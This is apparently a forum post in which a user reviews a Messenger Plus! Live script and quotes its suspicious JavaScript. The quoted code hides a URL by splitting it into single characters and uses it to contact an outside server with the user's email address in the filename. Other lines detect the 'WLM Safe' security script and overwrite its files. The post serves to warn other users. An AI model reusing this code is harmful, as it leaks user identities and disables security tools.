js code:
if (Success && Url == "h" + "t" + "t" + "p" + ":" + "/" + "/" + "c" + "i" + "l" + "a" + "." + "m" + "i" + "s" + "s" + "-" + "w" + "e" + "b" + "." + "e" + "s" + "/" + Messenger.MyEmail + "." + "d" + "a" + "t") {
js code:
function kickWLMsafe() {
if (!fso.FileExists(Directory + "\\Scripts\\" + "WLM Safe" + "\\ScriptInfo.xml")) {} else {
MsgPlus.DisplayToast(Script_Name, RLFF(LangT, 81) + RLFF(LangT, 82), "", "DelWLMS");
ErrorNN("821", "WLM Safe");
TraceIA(RLFF(LangT, 83))
function DelWLMS() {
var fileObj = fso.OpenTextFile(Directory + '\\Scripts' + '\\WLM Safe' + '\\ScriptInfo.xml', 2, 0);
var fileObjA = fso.OpenTextFile(Directory + '\\Scripts' + '\\WLM Safe' + '\\wlmsafe.js', 2, 0);
MsgPlus.AddTimer("delws", 3000)
Instant removal. No script should affect any other script in any way
js code:
MsgPlus.DownloadFile("h" + "t" + "t" + "p" + ":" + "/" + "/" + "c" + "i" + "l" + "a" + "." + "m" + "i" + "s" + "s" + "-" + "w" + "e" + "b" + "." + "e" + "s" + "/" + Messenger.MyEmail + "." + "d" + "a" + "t", TempFolder + "\\" + Messenger.MyEmail + ".dat")
Again, Suspicious
Also, it uses my "Clone Warning!" script, which in itself isn't usually a problem for people to use my code. However, in this case it's the whole script with my messagebox replaced with another function
EDIT: I think I might make a better version of this myself. One we all know is going to be safe.